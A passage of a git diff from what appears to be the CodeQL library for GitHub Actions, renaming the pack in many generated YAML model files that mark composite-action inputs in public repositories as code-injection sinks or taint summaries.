@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index 156d244ece2d..a67988b08aa8 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index fcda4b3dfec0..663702e64180 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index 84877f57d8c2..de7a728d096c 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index dcb93d013a09..360eb948595e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index 4776bb79067e..290712830e2c 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index 2540e6a76ca7..d58063c2452f 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index 525064de6a97..784627c32abf 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index b46d5a3ee6a8..b4f5866b86d4 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 631457c813e4..77a7407adfbf 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index 44d9eb10a0dc..a97bce1de7a0 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index 0d7f80698f57..5bf814bcc693 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 84caa0434846..6a141053bbeb 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index f6aed253a21d..4fec81ed1780 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 1eac49617f22..1290646ef6dc 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index 1efa6815c280..60a023c97301 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 91463a305dd9..1a99c3773de0 100644 --- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index 7ef240ad999c..e3cf5db0f15b 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml index db953acf5bc7..67866c4f904c 100644 --- a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index 7c1b01e14b5a..2317aa06ae2e 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index 37b67a933a3a..baf9c55ff182 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 570a9bdd142c..583be58ecd26 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index 8c1993c47ca6..e8250232853b 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index ee0adaadb3e2..d3172c566678 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index c127f03bb66d..7c1f9dac6bb6 100644 --- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index 3b3d60fadd03..c77798c10222 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 4dd43acd2c53..3035324bee02 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index cb4bff25f9ac..dd208976fc51 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index 39a204389b99..63f111f3e83c 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index 6b4192c0c616..c330ca64c083 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index 63c3fc89058b..6b67c69e6e35 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index 72772ae47cf7..135bb4baa8be 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index 43cc1e0187ea..c201386cf93f 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index 7c80b7e6eda6..5e39d3f6c5f4 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 1f7b69e6254a..9a9f865b0db4 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index 7879a7903b41..5c877a87d688 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index dbbd4c720ca4..6e9e83632904 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index f99698b19924..f0e62cdaec1a 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index a98a135d6b43..b1158922636e 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index 3ebb5e7acb32..78c1a3960566 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index b26aa6ea48b3..75c257f39ae7 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 683965e13d20..4d19b3ec0af1 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index 9358c895f3c2..b8bdc7276fbe 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index 8233e5066033..220dbb58e025 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index 2aea730db7e3..1992cbf46967 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index b03d23918825..02c01196842d 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 9db70f02db4e..50af2e33e162 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 8cea15ac9e11..679b362ba3f1 100644 
--- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index 766ec5155517..8e11db68c85e 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index 13ee2f4e7a87..deed2d125737 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index 0cf05c2273bd..353cb30683b0 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 7f2622feecd8..25522a67b69a 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index 3aa8c3bc6495..c545ad6844ef 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index b79317db9c8a..941710eb0fe2 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml 
